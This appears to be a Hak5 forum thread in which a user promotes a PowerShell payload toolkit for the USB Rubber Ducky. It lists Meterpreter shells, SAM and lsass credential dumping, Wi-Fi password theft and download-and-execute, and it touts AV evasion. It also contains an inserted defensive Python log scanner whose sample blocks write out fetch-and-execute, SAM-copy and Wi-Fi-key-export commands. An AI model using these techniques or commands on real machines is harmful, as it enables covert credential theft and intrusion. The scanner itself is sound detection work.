b00stfr3ak Posted September 18, 2013 (edited)

This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if anyone wants to add to the script, it should be pretty easy; all the files are separated for re-usability.

Power Shell Scripts for the Hak5 Ducky

1) Fast Meterpreter
2) Reverse Meterpreter
3) Dump Domain and Local Hashes
4) Dump Lsass Process
5) Dump Wifi Passwords
6) Wget Execute
99) Exit

All payloads are written in powershell so nothing should be caught by AV

https://github.com/b00stfr3ak/power-ducky

Fast Meterpreter: Stores the meterpreter script on a web server; the ducky will then go grab the script using ssl and execute it on the victim's machine.
Reverse Meterpreter: Creates a reverse meterpreter shell through powershell injection.
Dump Domain and Local Hashes: Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.
Dump Lsass Process: Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.
Dump Wifi Passwords: Dumps all available wifi profiles, and then dumps each file through a tcp socket.
Wget Execute: Downloads a file and executes it on the victim's machine.

Edited October 19, 2013 by b00stfr3ak
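Added defender-side example, not from this thread or the power-ducky repository: a small Python scanner that checks PowerShell script block log text for the behaviours the payload list above describes (remote script fetch-and-execute, SAM/SYSTEM hive copies, lsass access, Wi-Fi profile export with cleartext keys, in-memory shellcode loading), so that script block logging and alerting can be tested against them. The sample entries, the rule names and the example.invalid host are constructed for the demonstration.

```python
import re

# Detection rules keyed by behaviour (names are this example's own). The regexes
# are deliberately loose: they surface candidates for analyst review, not exact matches.
RULES = {
    "remote_script_exec": re.compile(
        r"(DownloadString|Invoke-WebRequest|\biwr\b).*(\biex\b|Invoke-Expression)"
        r"|(\biex\b|Invoke-Expression).*(DownloadString|Invoke-WebRequest|\biwr\b)",
        re.I | re.S),
    "registry_hive_copy": re.compile(
        r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
    "lsass_access": re.compile(r"\blsass\b", re.I),
    "wifi_profile_export": re.compile(
        r"netsh\s+wlan\s+export\s+profile.*key\s*=\s*clear", re.I),
    "shellcode_injection": re.compile(r"Invoke-Shellcode|VirtualAlloc", re.I),
}


def classify(script_block: str) -> list:
    """Return the names of every rule the script block text matches (empty if benign)."""
    return [name for name, rx in RULES.items() if rx.search(script_block)]


def scan(blocks: list) -> list:
    """Scan a sequence of script-block texts; return (index, matched rules) for hits only."""
    hits = []
    for i, block in enumerate(blocks):
        names = classify(block)
        if names:
            hits.append((i, names))
    return hits


# Constructed sample script blocks (not real captures); example.invalid is a reserved name.
# Block 2 downloads a file without executing it, so it must NOT trigger remote_script_exec.
SAMPLE_BLOCKS = [
    "Get-Date",
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')",
    "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
    "reg save hklm\\sam C:\\Windows\\Temp\\sam.hiv",
    "Get-Process -Name lsass",
    "netsh wlan export profile key=clear folder=C:\\Windows\\Temp",
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_BLOCKS):
        print(f"block {idx}: {', '.join(names)}  <- {SAMPLE_BLOCKS[idx]}")
```

Feed real script block text (event ID 4104 message bodies) into scan() in place of SAMPLE_BLOCKS to confirm the logging pipeline actually carries these strings through.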
b00stfr3ak Posted September 22, 2013 (Author)

Added the ability to dump clear text Wifi passwords from available profiles. Thanks to Crashie at https://forums.hak5.org/index.php?/topic/29002-payload-wi-fi-password-stealer-saving-to-sd/
b00stfr3ak Posted October 17, 2013 (Author)

The power-ducky toolkit has been updated to support SSL. Now you can transfer files from the victim to the attacker all encrypted. It does take a while with larger files; however, it does work, and it happens in the background on the victim computer so they won't notice. Once the correct reg files are downloaded the script will print the hashes to the screen and write them to a file.
b00stfr3ak Posted October 19, 2013 (Author)

Fast Meterpreter has been added to the power-ducky toolkit. This payload stores a meterpreter script on a web server and then all the ducky has to do is download that script through ssl and then execute it. The beauty of this script is that it is 10 lines long and the actual powershell command is less than 200 characters.

Ideas from:
http://www.pentestgeek.com/2013/09/18/invoke-shellcode/
https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/
b00stfr3ak Posted November 14, 2013 (Author)

Has anyone tried this?
xrad Posted November 15, 2013

> Has anyone tried this?

It looks good b00stfr3ak, please keep up the great work. I would try it but I'm away for a few days. When I get back and try it, I'll give some feedback as best I can. I'm a bit new to the Ducky, and very glad to see people still coming up with stuff for it.
mawlmiface Posted November 29, 2013

Have you tried implementing Invoke-Mimikatz, from PowerSploit?
mawlmiface Posted December 1, 2013 (edited)

Also, how does the dump domain hashes work? I thought you could only dump domain hashes from the NTDS.DIT file.

Edited December 1, 2013 by mawlmiface
b00stfr3ak Posted December 9, 2013 (Author)

> Have you tried implementing Invoke-Mimikatz, from PowerSploit?

This could be implemented. I would just need to ask if I could use his script.

> Also, how does the dump domain hashes work? I thought you could only dump domain hashes from the NTDS.DIT file.

If a computer is on the domain, by default it keeps a number of cached credentials stored just in case the workstation can't talk to the domain controller.
factgasm Posted December 10, 2013

Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno.

Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.

I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?). I wasn't quite sure what to expect. Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things), which Darren covers in one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.

You mention that it's possible to "6) Wget Execute". Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However, in looking at the documentation I'm not sure how to go about tailoring the source code so that it downloads the particular file I want from the particular source website, as it appears your source code is written in Ruby.

Please help! [/thick]
b00stfr3ak Posted December 13, 2013 (Author)

> Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno.
>
> Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful.
>
> I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?). I wasn't quite sure what to expect. Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things), which Darren covers in one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art.
>
> You mention that it's possible to "6) Wget Execute". Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However, in looking at the documentation I'm not sure how to go about tailoring the source code so that it downloads the particular file I want from the particular source website, as it appears your source code is written in Ruby.
>
> Please help! [/thick]

It would be a good idea to create some videos on this, I just haven't had time. Can you clone the newest repo? This should get rid of the hex option (it was broken and took too much time). The best option to try is fast meterpreter. It is the fastest command and an instant meterpreter shell in memory (so no AV to worry about). Wget Execute is OK, but then you have to worry about dropping a binary file and not getting caught by AV.
b00stfr3ak Posted December 31, 2013 (Author)

I tried to make the videos today but they didn't turn out right. If anyone knows of a screen recording software for Linux that is low resource, please list it. I have updated the repo and tested it on a new kali box and confirmed the scripts are working.
FlyinGrub Posted January 1, 2014

http://www.omgubuntu.co.uk/2013/12/simple-screen-recorder-linux ?
b00stfr3ak Posted January 1, 2014 (Author)

> http://www.omgubuntu.co.uk/2013/12/simple-screen-recorder-linux ?

Yeah, that is the one I tried, but running two VMs and the screen recorder uses too much CPU for my laptop. It misses key presses from the ducky.
jojopyro Posted February 9, 2014

Possible to allow the script to set 'host ip' to a hostname as well?
b00stfr3ak Posted May 3, 2014 (Author)

> Possible to allow the script to set 'host ip' to a hostname as well?

Does the script fail with DNS names? It should just pass everything to metasploit. I'll take a look tonight. I plan on rewriting the tool, because the code looks so bad.
S3V3N Posted June 16, 2014

Is it possible to have a sub menu option to set the Meterpreter IPs on the fly (as I use a multi-hop VPN and my Metasploit IP can change)? Also, add an option to drop a file to load a new Meterpreter into memory at boot up.
S3V3N Posted June 18, 2014

b00stfr3ak, can you post some instructions on how to properly edit the files and what info is needed to get all of the options set up and running correctly? Greatly appreciated, keep up the AWESOME work!!
jm0202 Posted March 29, 2015

Hello b00stfr3ak,

Powerducky is a great tool; however, the latest version checked in to github has some issues. It seems there was some syntax issue in the main menu, and the payload to add a user to the admin group fails, since the localadmin word is misspelled.

For the reverse shell attack I am able to make it work from the rubber ducky: the payload is injected and I got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there. I tried to use the meterpreter x64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for an x64 victim and your payload in github is specific for 32 bits. Do you have a reverse shell payload for x64?

Thank you.
b00stfr3ak Posted March 31, 2015 (Author)

> Hello b00stfr3ak,
>
> Powerducky is a great tool; however, the latest version checked in to github has some issues. It seems there was some syntax issue in the main menu, and the payload to add a user to the admin group fails, since the localadmin word is misspelled.
>
> For the reverse shell attack I am able to make it work from the rubber ducky: the payload is injected and I got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there. I tried to use the meterpreter x64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for an x64 victim and your payload in github is specific for 32 bits. Do you have a reverse shell payload for x64?
>
> Thank you.

Thanks, I fixed the add admin syntax and it has been pushed to github. What are the syntax issues with the main menu? x32 works on x64 OS. It might have been a network issue, because the powershell code did reach the metasploit server. I'm thinking about adding the option to not use a stager, but I'll have to do that later. For any issues, can you post them to github so I can keep track of them? Thanks!
shamwow Posted July 7, 2015

> This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if anyone wants to add to the script, it should be pretty easy; all the files are separated for re-usability.
>
> Power Shell Scripts for the Hak5 Ducky
>
> 1) Fast Meterpreter
> 2) Reverse Meterpreter
> 3) Dump Domain and Local Hashes
> 4) Dump Lsass Process
> 5) Dump Wifi Passwords
> 6) Wget Execute
> 99) Exit
>
> All payloads are written in powershell so nothing should be caught by AV
>
> https://github.com/b00stfr3ak/power-ducky
>
> Fast Meterpreter: Stores the meterpreter script on a web server; the ducky will then go grab the script using ssl and execute it on the victim's machine.
> Reverse Meterpreter: Creates a reverse meterpreter shell through powershell injection.
> Dump Domain and Local Hashes: Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server.
> Dump Lsass Process: Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server.
> Dump Wifi Passwords: Dumps all available wifi profiles, and then dumps each file through a tcp socket.
> Wget Execute: Downloads a file and executes it on the victim's machine.

How do I set this up to work on the Ducky?